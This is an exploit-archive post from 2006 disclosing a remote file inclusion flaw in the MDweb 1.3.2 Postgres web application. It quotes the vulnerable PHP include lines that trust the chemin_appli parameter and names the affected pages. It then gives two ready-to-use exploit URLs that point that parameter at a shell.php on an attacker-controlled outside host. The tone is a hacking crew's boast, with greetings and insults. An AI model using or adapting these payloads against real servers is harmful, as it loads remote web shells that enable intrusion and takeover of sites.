Home / exploits Mdweb132-postgres.txt
Posted on 25 October 2006
###### ToXiC ######################### # # Mdweb132-postgres: Remote File Inclusion by ToXiC CreW # # ToXic Security Italian CreW # BuG FounD by Drago84 # # Application Affect: # Mdweb132-postgres # # # Sorce Code: # http://jc.desconnets.free.fr/mdweb/install/windows/mdweb132-postgres-s ans-installeur.zip # # # Page: # form_org.inc.php # country_insert.php # # # Problem: # # // Inclusion du fichier pour l'initialisation et le chargement des étiquettes de chaque champ. # include_once $chemin_appli."admin/inc/organisations/initLabelForm_org.inc.php"; # // Inclusion du fichier pour l'initialisation et le chargement du code HTML des champs de saisie. # include_once $chemin_appli."admin/inc/organisations/initChampsForm_org.inc.php"; # // Inclusion du fichier pour l'écriture des fonctions Javascript de contrôle de saisie. # include_once $chemin_appli."config/fonctions_ctrl_js.inc.php"; # # Dir : # /mdweb/admin/inc/organisations/ # # # # # # # ExPloit : # http://www.site.com/Agora_PATH//mdweb/admin/inc/organisations/form_org .inc.php?chemin_appli=http://sonic-banda-di-lamer.gay/shell.php? # # http://www.site.com/Agora_PATH//mdweb/admin/inc/organisations/country_ insert.php?chemin_appli=http://sonic-banda-di-lamer.gay/shell.php? # # # # GrEatZ All Member of ToXiC, Str0ke # # # FUCK #Sonic # ###### ToXiC #########